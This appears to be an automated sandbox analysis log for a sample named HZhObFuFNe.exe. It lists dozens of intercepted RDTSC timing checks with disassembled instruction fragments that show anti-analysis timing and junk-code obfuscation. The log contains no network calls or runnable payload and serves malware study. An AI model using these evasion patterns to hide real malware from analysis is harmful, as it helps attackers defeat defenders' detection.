Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15C6FCE second address: 15C6FF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jmp 00007F6FA52293BEh 0x0000000f pushad 0x00000010 popad 0x00000011 pop ecx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15C6FF8 second address: 15C6FFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15CBA1D second address: 15CBA21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15CBA21 second address: 15CBA66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F6FA4524827h 0x0000000d jmp 00007F6FA4524821h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F6FA4524822h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15CF29E second address: 15CF2AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F6FA52293C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15CF2AA second address: 15CF2C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA452481Ah 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15CF2C0 second address: 15CF2D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F6FA52293BAh 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15D1861 second address: 15D1867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 15D1867 second address: 15D1874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 jo 00007F6FA52293B6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1610BEE second address: 1610BF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1608EB2 second address: 1608ED3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F6FA52293C8h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1608ED3 second address: 1608EE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edx 0x00000006 jc 00007F6FA4524816h 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1608EE6 second address: 1608EEC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 161D0B8 second address: 161D0CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F6FA4524816h 0x0000000e jno 00007F6FA4524816h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 161D0CC second address: 161D0D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 161D0D2 second address: 161D0F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F6FA4524826h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 161D0F3 second address: 161D121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6FA52293C4h 0x00000010 jmp 00007F6FA52293BFh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 161D121 second address: 161D157 instructions: 0x00000000 rdtsc 0x00000002 js 00007F6FA4524816h 0x00000008 jno 00007F6FA4524816h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F6FA452481Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F6FA4524828h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E2AA9 second address: 16E2AAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E2AAF second address: 16E2AB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E2AB3 second address: 16E2AB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E2AB9 second address: 16E2ABE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E2ABE second address: 16E2ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA52293C4h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E2ADD second address: 16E2AE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E2AE5 second address: 16E2AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E1878 second address: 16E1884 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F6FA4524816h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E1884 second address: 16E1893 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6FA52293B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E1C94 second address: 16E1C98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E1C98 second address: 16E1CB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293C6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E1CB2 second address: 16E1CCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 je 00007F6FA4524816h 0x0000000d pop eax 0x0000000e pop ecx 0x0000000f je 00007F6FA4524828h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E1CCB second address: 16E1CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E1E76 second address: 16E1E7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E2298 second address: 16E22C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 pop eax 0x00000007 jmp 00007F6FA52293BDh 0x0000000c jnc 00007F6FA52293B6h 0x00000012 jmp 00007F6FA52293C3h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E25D7 second address: 16E25F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA4524827h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E25F3 second address: 16E25FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F6FA52293B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E277A second address: 16E277E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E277E second address: 16E278F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jne 00007F6FA52293B6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E278F second address: 16E27C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA4524822h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F6FA4524825h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E6A26 second address: 16E6A42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E6D02 second address: 16E6D14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007F6FA4524816h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E6D14 second address: 16E6D2F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6FA52293B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6FA52293BFh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E6D2F second address: 16E6D33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E9E96 second address: 16E9EA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E9EA3 second address: 16E9EB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA4524822h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16E9EB9 second address: 16E9EBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16EB92F second address: 16EB933 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 16EB933 second address: 16EB954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F6FA52293B8h 0x0000000c pushad 0x0000000d jnp 00007F6FA52293B6h 0x00000013 pushad 0x00000014 popad 0x00000015 jng 00007F6FA52293B6h 0x0000001b popad 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750075 second address: 775017D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6FA452481Fh 0x00000009 add esi, 5BA0856Eh 0x0000000f jmp 00007F6FA4524829h 0x00000014 popfd 0x00000015 mov eax, 17875EF7h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d sub esp, 18h 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F6FA4524828h 0x00000027 sbb ch, 00000018h 0x0000002a jmp 00007F6FA452481Bh 0x0000002f popfd 0x00000030 push esi 0x00000031 pushfd 0x00000032 jmp 00007F6FA452481Fh 0x00000037 add eax, 784720DEh 0x0000003d jmp 00007F6FA4524829h 0x00000042 popfd 0x00000043 pop eax 0x00000044 popad 0x00000045 push ebp 0x00000046 jmp 00007F6FA452481Ch 0x0000004b mov dword ptr [esp], ebx 0x0000004e jmp 00007F6FA4524820h 0x00000053 mov ebx, dword ptr [eax+10h] 0x00000056 jmp 00007F6FA4524820h 0x0000005b xchg eax, esi 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f pushfd 0x00000060 jmp 00007F6FA452481Dh 0x00000065 adc esi, 217D3326h 0x0000006b jmp 00007F6FA4524821h 0x00000070 popfd 0x00000071 jmp 00007F6FA4524820h 0x00000076 popad 0x00000077 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 775017D second address: 7750212 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F6FA52293C9h 0x0000000f xchg eax, esi 0x00000010 pushad 0x00000011 push eax 0x00000012 call 00007F6FA52293C3h 0x00000017 pop esi 0x00000018 pop edi 0x00000019 mov bx, cx 0x0000001c popad 0x0000001d mov esi, dword ptr [770206ECh] 0x00000023 jmp 00007F6FA52293C0h 0x00000028 test esi, esi 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov ax, dx 0x00000030 pushfd 0x00000031 jmp 00007F6FA52293C9h 0x00000036 and si, 5756h 0x0000003b jmp 00007F6FA52293C1h 0x00000040 popfd 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750212 second address: 7750247 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA4524821h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F6FA452576Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 call 00007F6FA4524823h 0x00000017 pop esi 0x00000018 mov ecx, edi 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750247 second address: 77502B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6FA52293C0h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, edi 0x0000000e jmp 00007F6FA52293BEh 0x00000013 push eax 0x00000014 jmp 00007F6FA52293BBh 0x00000019 xchg eax, edi 0x0000001a jmp 00007F6FA52293C6h 0x0000001f call dword ptr [76FF0B60h] 0x00000025 mov eax, 7571E5E0h 0x0000002a ret 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F6FA52293C7h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 77502B0 second address: 77502C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6FA4524824h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 77502C8 second address: 77502E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000044h 0x0000000a pushad 0x0000000b movsx edx, cx 0x0000000e mov si, B435h 0x00000012 popad 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov ecx, 6DE4220Fh 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 77502E5 second address: 7750329 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6FA452481Bh 0x00000009 and ch, 0000001Eh 0x0000000c jmp 00007F6FA4524829h 0x00000011 popfd 0x00000012 movzx esi, dx 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F6FA452481Fh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750329 second address: 7750358 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6FA52293BDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750358 second address: 7750368 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6FA452481Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750368 second address: 775037A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov edx, eax 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 775037A second address: 7750380 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750420 second address: 7750486 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b pushad 0x0000000c mov cx, 1093h 0x00000010 call 00007F6FA52293C8h 0x00000015 mov ecx, 58593B71h 0x0000001a pop esi 0x0000001b popad 0x0000001c test esi, esi 0x0000001e jmp 00007F6FA52293BDh 0x00000023 je 00007F7014A785F4h 0x00000029 jmp 00007F6FA52293BEh 0x0000002e sub eax, eax 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7750486 second address: 775048C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7751677 second address: 77516A5 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F6FA452481Eh 0x00000008 sbb eax, 5496DC78h 0x0000000e jmp 00007F6FA452481Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 mov dword ptr [edx+34h], eax 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 77516A5 second address: 7751701 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F6FA52293C0h 0x00000008 add ch, FFFFFFD8h 0x0000000b jmp 00007F6FA52293BBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov dl, ah 0x00000015 popad 0x00000016 test ecx, 00000700h 0x0000001c jmp 00007F6FA52293BBh 0x00000021 jne 00007F7014A773F0h 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a mov eax, edi 0x0000002c call 00007F6FA52293C7h 0x00000031 pop ecx 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7751701 second address: 7751707 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7751707 second address: 775170B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 775170B second address: 7751763 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA4524820h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b or dword ptr [edx+38h], FFFFFFFFh 0x0000000f jmp 00007F6FA4524820h 0x00000014 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000018 jmp 00007F6FA4524820h 0x0000001d or dword ptr [edx+40h], FFFFFFFFh 0x00000021 jmp 00007F6FA4524820h 0x00000026 pop esi 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7751763 second address: 775176D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, 5D7A366Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 775176D second address: 775177C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6FA452481Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 775177C second address: 7751780 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7751780 second address: 775179B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6FA4524820h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 775179B second address: 77517A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 7790C65 second address: 7790C77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6FA452481Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 774075D second address: 77407A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b jmp 00007F6FA52293BEh 0x00000010 pushad 0x00000011 mov eax, 36545287h 0x00000016 mov ax, 9023h 0x0000001a popad 0x0000001b popad 0x0000001c push eax 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F6FA52293C5h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 77407A4 second address: 77407DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6FA452481Eh 0x0000000b popad 0x0000000c xchg eax, ebp 0x0000000d jmp 00007F6FA4524820h 0x00000012 mov ebp, esp 0x00000014 pushad 0x00000015 call 00007F6FA452481Eh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 77407DD second address: 7740817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007F6FA52293C1h 0x0000000b or ecx, 1936BEE6h 0x00000011 jmp 00007F6FA52293C1h 0x00000016 popfd 0x00000017 popad 0x00000018 pop ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c movsx edx, si 0x0000001f push ecx 0x00000020 pop edx 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 76E002C second address: 76E0044 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6FA4524824h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 76E0044 second address: 76E0048 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 76E0048 second address: 76E0079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F6FA452481Eh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F6FA4524827h 0x00000016 rdtsc
